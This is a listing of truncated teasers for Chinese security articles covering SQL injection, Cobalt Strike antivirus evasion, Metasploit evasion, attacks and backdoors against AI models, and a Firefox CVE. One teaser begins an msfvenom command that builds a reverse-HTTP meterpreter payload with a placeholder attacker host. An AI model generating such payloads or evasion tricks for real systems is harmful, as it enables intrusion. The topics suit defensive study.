作者:broken5 原文地址:见阅读原文0x01 前言之前遇到过遇到过类似的注入,因为某种原因在注入语句中不能存在逗号,环境又是MSSQL,所以很难构造出来有效的payload...
技术分享 | 搜索框之%的妙用
该文章为搬运文章,不是作者本人投稿,侵删!作者:pmiaowu 原文地址:见阅读原文0x01 前言在我们实际渗透中搜索框是常见的功能,我们也会经常测试注入之类的(当然一般都会没注入),但是...
VeinMind Tools v2.0 技术分享 |(三):报告器
👉:VeinMind Tools 正式发布 v2.0 版本 | 支持镜像/容器漏洞扫描等多种插件👉:VeinMind Tools v2.0 技术分享 |(二):容器逃逸风险检测👉:VeinMind T...
【技术分享】如何利用API对AI发动攻击?
前 言 现在机器学习即服务(Machine Learning as a Service,MLaaS)是非常热门的,很多大厂都把自己的模型开放作为其云平台的一项服务,国...
Java反序列化技术分享(2) 加载类的几种方法
Java是编译型语言,所有的Java代码都需要被编译成字节码来让JVM执行。Java类初始化时会调用 java.lang.ClassLoader 加载类字节码,ClassLoader会调用define...
神兵利器 | 技术分享CS二开特征消除2
cobaltstrike4.5特征消除2修改了内置stage的配置,实现硬性特征消除修改部分payload,实现基本免杀修改checksum8 判等参数public static long check...
【技术分享】钓鱼邮件分析溯源
原文始发于微信公众号():【技术分享】钓鱼邮件分析溯源
技术分享 | 基于攻击视角(GOBY)的暴露面梳理及防护技术(下)
Goby社区第 20 篇技术分享文章全文共:3212 字 预计阅读时间:9 分钟本文章共奖励@Z0RR0 12000...
【技术分享】对AI发动后门攻击
前 言 后门一词师傅们应该很熟悉了,后门本意是指一座建筑背面开设的门,通常比较隐蔽,为进出建筑的人提供方便和隐蔽。在安全领域,后门是指绕过安全控制而获取对程序或系统访...
【技术分享】CVE-2020-6828:Firefox for Android任意文件覆盖漏洞分析
2020年4月,Mozilla安全公告披露并修复了我在Firefox 68.5提交的一个漏洞,漏洞编号为CVE-2020-6828。攻击者可利用该漏洞覆盖Firefox私有目录中的文件,从而控制浏览器...
技术分享 | Msf免杀思路分享
1Part.1首先我们打开终端输入此项命令生成python文件用来上线MSFmsfvenom -p python/meterpreter_reverse_http LHOST=<IP> L...
【技术分享】Intel AES-NI使用入门
AESNI是Intel开发的一种x64架构的SIMD指令集,专门为AES加密算法提供硬件加速,对SIMD有一定了解的人基本都知道AESNI的存在。但由于AES本身的不对称结构,以及AESNI的特殊设计...